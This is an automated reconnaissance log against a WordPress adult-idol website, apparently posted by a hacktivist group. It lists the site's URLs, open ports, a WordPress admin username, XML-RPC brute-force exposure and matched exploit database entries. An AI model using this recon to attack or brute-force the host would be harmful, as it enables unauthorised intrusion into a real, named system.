18573[*] http://idolblog.tv/category/nude/
18574[*] http://idolblog.tv/category/other/
18575[*] http://idolblog.tv/category/photobooks/
18576[*] http://idolblog.tv/category/uncategorized/
18577[*] http://idolblog.tv/category/videos/
18578[*] http://idolblog.tv/comments/feed/
18579[*] http://idolblog.tv/feed/
18580[*] http://idolblog.tv/idols/
18581[*] http://idolblog.tv/miho-kaneko-imouto-tv-sc_kaneko_m08/
18582[*] http://idolblog.tv/miho-kaneko-imouto-tv-sc_kaneko_m08/#comments
18583[*] http://idolblog.tv/miho-kaneko-imouto-tv-sc_kaneko_m08/sc_kaneko_m08_009/
18584[*] http://idolblog.tv/miho-kaneko-imouto-tv-sc_kaneko_m08/sc_kaneko_m08_035/
18585[*] http://idolblog.tv/miho-kaneko-imouto-tv-sc_kaneko_m08/sc_kaneko_m08_039/
18586[*] http://idolblog.tv/miho-kaneko-imouto-tv-sc_kaneko_m08/sc_kaneko_m08_053/
18587[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m01/
18588[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m01/#comments
18589[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m01/sp1_kaneko_m01_013/
18590[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m01/sp1_kaneko_m01_033/
18591[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m01/sp1_kaneko_m01_039/
18592[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m02/
18593[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m02/#comments
18594[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m02/sp1_kaneko_m02_002/
18595[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m02/sp1_kaneko_m02_005/
18596[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m02/sp1_kaneko_m02_024/
18597[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m02/sp1_kaneko_m02_027/
18598[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m03/
18599[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m03/#comments
18600[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m03/sp1_kaneko_m03_005/
18601[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m03/sp1_kaneko_m03_015/
18602[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m03/sp1_kaneko_m03_018/
18603[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m04/
18604[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m04/#comments
18605[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m04/sp1_kaneko_m04_007/
18606[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m04/sp1_kaneko_m04_008/
18607[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m04/sp1_kaneko_m04_018/
18608[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m04/sp1_kaneko_m04_019/
18609[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m05/
18610[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m05/#respond
18611[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m05/sp1_kaneko_m05_006/
18612[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m05/sp1_kaneko_m05_015/
18613[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m05/sp1_kaneko_m05_018/
18614[*] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m05/sp1_kaneko_m05_027/
18615[*] http://idolblog.tv/page/161/
18616[*] http://idolblog.tv/page/2/
18617[*] http://idolblog.tv/page/3/
18618[*] http://idolblog.tv/tag/ai/
18619[*] http://idolblog.tv/tag/ai-hanazawa/
18620[*] http://idolblog.tv/tag/ai-misaki/
18621[*] http://idolblog.tv/tag/airi-ebihara/
18622[*] http://idolblog.tv/tag/ai-shinozaki/
18623[*] http://idolblog.tv/tag/ai-takanashi/
18624[*] http://idolblog.tv/tag/ai-yamada/
18625[*] http://idolblog.tv/tag/ami/
18626[*] http://idolblog.tv/tag/angela-sugiyama/
18627[*] http://idolblog.tv/tag/anjyu-kouzuki/
18628[*] http://idolblog.tv/tag/anna-oonishi/
18629[*] http://idolblog.tv/tag/arisa-matsuo/
18630[*] http://idolblog.tv/tag/asada-hitomi/
18631[*] http://idolblog.tv/tag/asami-kondou/
18632[*] http://idolblog.tv/tag/ayaka-kasuga/
18633[*] http://idolblog.tv/tag/ayaka-obu/
18634[*] http://idolblog.tv/tag/ayaka-okita/
18635[*] http://idolblog.tv/tag/ayaka-ootani/
18636[*] http://idolblog.tv/tag/aya-kuromiya/
18637[*] http://idolblog.tv/tag/ayana-haduki/
18638[*] http://idolblog.tv/tag/ayana-nishinaga/
18639[*] http://idolblog.tv/tag/ayu-makihara/
18640[*] http://idolblog.tv/tag/chiemi-takayama/
18641[*] http://idolblog.tv/tag/chiharu-misaki/
18642[*] http://idolblog.tv/tag/chika-ayane/
18643[*] http://idolblog.tv/tag/chika-chimizu/
18644[*] http://idolblog.tv/tag/erena-yumemoto/
18645[*] http://idolblog.tv/tag/erika/
18646[*] http://idolblog.tv/tag/eri-kitami/
18647[*] http://idolblog.tv/tag/fuuka-nishihama/
18648[*] http://idolblog.tv/tag/fuuka-nishimama/
18649[*] http://idolblog.tv/tag/hana-nishino/
18650[*] http://idolblog.tv/tag/haruka-ando/
18651[*] http://idolblog.tv/tag/haruka-momokawa/
18652[*] http://idolblog.tv/tag/hikaru-takahashi/
18653[*] http://idolblog.tv/tag/hime-misaki/
18654[*] http://idolblog.tv/tag/hina-komatsu/
18655[*] http://idolblog.tv/tag/hina-sakuragi/
18656[*] http://idolblog.tv/tag/hina-yamamoto/
18657[*] http://idolblog.tv/tag/hitomi-ogata/
18658[*] http://idolblog.tv/tag/hiyori-izumi/
18659[*] http://idolblog.tv/tag/honoka-andou/
18660[*] http://idolblog.tv/tag/honoka-ayukawa/
18661[*] http://idolblog.tv/tag/ichika-nomura/
18662[*] http://idolblog.tv/tag/inoue-kurumi/
18663[*] http://idolblog.tv/tag/julia-kawamura/
18664[*] http://idolblog.tv/tag/jun-amaki/
18665[*] http://idolblog.tv/tag/kaede-kusano/
18666[*] http://idolblog.tv/tag/kanae-shiina/
18667[*] http://idolblog.tv/tag/kana-tsuruta/
18668[*] http://idolblog.tv/tag/kanna-aida/
18669[*] http://idolblog.tv/tag/karin/
18670[*] http://idolblog.tv/tag/karina/
18671[*] http://idolblog.tv/tag/kitty-kum/
18672[*] http://idolblog.tv/tag/koharu-nishino/
18673[*] http://idolblog.tv/tag/kyoko-isshiki/
18674[*] http://idolblog.tv/tag/lady-baby/
18675[*] http://idolblog.tv/tag/mai-sasaki/
18676[*] http://idolblog.tv/tag/mai-yamaguchi/
18677[*] http://idolblog.tv/tag/maria-mizushima/
18678[*] http://idolblog.tv/tag/mari-yamachi/
18679[*] http://idolblog.tv/tag/maya-kousaka/
18680[*] http://idolblog.tv/tag/mayumi-yamanaka/
18681[*] http://idolblog.tv/tag/meika-minami/
18682[*] http://idolblog.tv/tag/mei-oda/
18683[*] http://idolblog.tv/tag/mei-satsuki/
18684[*] http://idolblog.tv/tag/mey/
18685[*] http://idolblog.tv/tag/miharu-mochizuki/
18686[*] http://idolblog.tv/tag/miho-kaneko/
18687[*] http://idolblog.tv/tag/miina-tsubaki/
18688[*] http://idolblog.tv/tag/miku-nagase/
18689[*] http://idolblog.tv/tag/miku-takaoka/
18690[*] http://idolblog.tv/tag/minami-okada/
18691[*] http://idolblog.tv/tag/minami-serizawa/
18692[*] http://idolblog.tv/tag/mio-arisaka/
18693[*] http://idolblog.tv/tag/miori-ayama/
18694[*] http://idolblog.tv/tag/mio-tanabe/
18695[*] http://idolblog.tv/tag/miran-shimizu/
18696[*] http://idolblog.tv/tag/miruku-kawamura/
18697[*] http://idolblog.tv/tag/miyu-kinoshita/
18698[*] http://idolblog.tv/tag/miyu-sotohara/
18699[*] http://idolblog.tv/tag/miyu-suenaga/
18700[*] http://idolblog.tv/tag/momoe-tan/
18701[*] http://idolblog.tv/tag/momo-shiina/
18702[*] http://idolblog.tv/tag/naito-kurumi/
18703[*] http://idolblog.tv/tag/nami-asaoka/
18704[*] http://idolblog.tv/tag/nami-nishimori/
18705[*] http://idolblog.tv/tag/nanako-niimi/
18706[*] http://idolblog.tv/tag/naoko-eda/
18707[*] http://idolblog.tv/tag/natsumi-momose/
18708[*] http://idolblog.tv/tag/nene-koga/
18709[*] http://idolblog.tv/tag/noriko-kijima/
18710[*] http://idolblog.tv/tag/rei-kuromiya/
18711[*] http://idolblog.tv/tag/reina-hirose/
18712[*] http://idolblog.tv/tag/reina-yamada/
18713[*] http://idolblog.tv/tag/remi-shimada/
18714[*] http://idolblog.tv/tag/rie-kaneko/
18715[*] http://idolblog.tv/tag/rikako-yamada/
18716[*] http://idolblog.tv/tag/rina-shimoe/
18717[*] http://idolblog.tv/tag/rui-yamashita/
18718[*] http://idolblog.tv/tag/rumi-ishino/
18719[*] http://idolblog.tv/tag/runa-hamakawa/
18720[*] http://idolblog.tv/tag/runa-tsukishima/
18721[*] http://idolblog.tv/tag/saaya-irie/
18722[*] http://idolblog.tv/tag/sakura-airi/
18723[*] http://idolblog.tv/tag/sana-tsuchiyama/
18724[*] http://idolblog.tv/tag/sarina-kashiwagi/
18725[*] http://idolblog.tv/tag/sayaka-tomaru/
18726[*] http://idolblog.tv/tag/seina-tsurumaki/
18727[*] http://idolblog.tv/tag/seira-goto/
18728[*] http://idolblog.tv/tag/sena-shinonome/
18729[*] http://idolblog.tv/tag/senon-gojo/
18730[*] http://idolblog.tv/tag/sora-oosawa/
18731[*] http://idolblog.tv/tag/tomoe-yamanaka/
18732[*] http://idolblog.tv/tag/tsubasa-akimoto/
18733[*] http://idolblog.tv/tag/wakana-tsukimori/
18734[*] http://idolblog.tv/tag/yui-ito/
18735[*] http://idolblog.tv/tag/yuri-kudo/
18736[*] http://idolblog.tv/tag/yurina-nakayama/
18737[*] http://idolblog.tv/tag/yuri-takase/
18738[*] http://idolblog.tv/tag/yuuki-kana/
18739[*] http://idolblog.tv/tag/yuumi-hanikami/
18740[*] http://idolblog.tv/tag/yuuna-arai/
18741[*] http://idolblog.tv/#top
18742[*] http://latinblog.tv/
18743[*] http://modelblog.tv/
18744[*] http://sexyblog.tv/
18745[*] https://mylove.is/
18746[*] https://theporndude.com/?utm_source=idolblog&utm_campaign=idolblog&utm_medium=referral
18747[*] http://teensblog.tv/
18748[*] http://www.teenmodels.club/
18749[INFO] GOOGLE has 303,000 results (0.26 seconds) about http://idolblog.tv/
18750[INFO] BING shows 89.248.174.131 is shared with 79 hosts/vhosts
18751[INFO] Shodan detected the following opened ports on 89.248.174.131:
18752[*] 1
18753[*] 110
18754[*] 111
18755[*] 143
18756[*] 22
18757[*] 25
18758[*] 3306
18759[*] 4
18760[*] 443
18761[*] 465
18762[*] 53
18763[*] 80
18764[*] 993
18765[*] 995
18766[INFO] ------VirusTotal SECTION------
18767[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
18768[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
18769[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
18770[INFO] ------Alexa Rank SECTION------
18771[INFO] Percent of Visitors Rank in Country:
18772[INFO] Percent of Search Traffic:
18773[INFO] Percent of Unique Visits:
18774[INFO] Total Sites Linking In:
18775[*] Total Sites
18776[INFO] Useful links related to idolblog.tv - 89.248.174.131:
18777[*] https://www.virustotal.com/pt/ip-address/89.248.174.131/information/
18778[*] https://www.hybrid-analysis.com/search?host=89.248.174.131
18779[*] https://www.shodan.io/host/89.248.174.131
18780[*] https://www.senderbase.org/lookup/?search_string=89.248.174.131
18781[*] https://www.alienvault.com/open-threat-exchange/ip/89.248.174.131
18782[*] http://pastebin.com/search?q=89.248.174.131
18783[*] http://urlquery.net/search.php?q=89.248.174.131
18784[*] http://www.alexa.com/siteinfo/idolblog.tv
18785[*] http://www.google.com/safebrowsing/diagnostic?site=idolblog.tv
18786[*] https://censys.io/ipv4/89.248.174.131
18787[*] https://www.abuseipdb.com/check/89.248.174.131
18788[*] https://urlscan.io/search/#89.248.174.131
18789[*] https://github.com/search?q=89.248.174.131&type=Code
18790[INFO] Useful links related to AS202425 - 89.248.174.0/24:
18791[*] http://www.google.com/safebrowsing/diagnostic?site=AS:202425
18792[*] https://www.senderbase.org/lookup/?search_string=89.248.174.0/24
18793[*] http://bgp.he.net/AS202425
18794[*] https://stat.ripe.net/AS202425
18795[INFO] Date: 20/07/19 | Time: 02:57:28
18796[INFO] Total time: 1 minute(s) and 48 second(s)
18797######################################################################################################################################
18798[-] Date & Time: 20/07/2019 02:53:19
18799[I] Threads: 5
18800[-] Target: http://idolblog.tv (89.248.174.131)
18801[M] Website Not in HTTPS: http://idolblog.tv
18802[I] Server: Apache/2
18803[I] X-Powered-By: PHP/5.6.35
18804[L] X-Frame-Options: Not Enforced
18805[I] Strict-Transport-Security: Not Enforced
18806[I] X-Content-Security-Policy: Not Enforced
18807[I] X-Content-Type-Options: Not Enforced
18808[L] Robots.txt Found: http://idolblog.tv/robots.txt
18809[I] CMS Detection: WordPress
18810[I] Wordpress Version: 5.2.2
18811[I] Wordpress Theme: twentytwelve
18812[-] WordPress usernames identified:
18813[M] idolblog
18814[M] XML-RPC services are enabled
18815[M] Website vulnerable to XML-RPC Brute Force Vulnerability
18816[I] Autocomplete Off Not Found: http://idolblog.tv/wp-login.php
18817[-] Default WordPress Files:
18818[I] http://idolblog.tv/license.txt
18819[I] http://idolblog.tv/readme.html
18820[I] http://idolblog.tv/wp-content/themes/twentynineteen/readme.txt
18821[I] http://idolblog.tv/wp-includes/ID3/license.commercial.txt
18822[I] http://idolblog.tv/wp-includes/ID3/license.txt
18823[I] http://idolblog.tv/wp-includes/ID3/readme.txt
18824[I] http://idolblog.tv/wp-includes/images/crystal/license.txt
18825[I] http://idolblog.tv/wp-includes/js/plupload/license.txt
18826[I] http://idolblog.tv/wp-includes/js/swfupload/license.txt
18827[I] http://idolblog.tv/wp-includes/js/tinymce/license.txt
18828[-] Searching Wordpress Plugins ...
18829[I] akismet
18830[M] EDB-ID: 37826 "WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities"
18831[M] EDB-ID: 37902 "WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities"
18832[I] bwp-recent-comments v1.2.2
18833[I] feed
18834[M] EDB-ID: 38624 "WordPress Plugin WP Feed - 'nid' SQL Injection"
18835[I] wp-pagenavi v2.92
18836[I] Checking for Directory Listing Enabled ...
18837[-] Date & Time: 20/07/2019 03:00:24
18838[-] Completed in: 0:07:05
18839#######################################################################################################################################
18840 Anonymous JTSEC #OpChildSafety Full Recon #3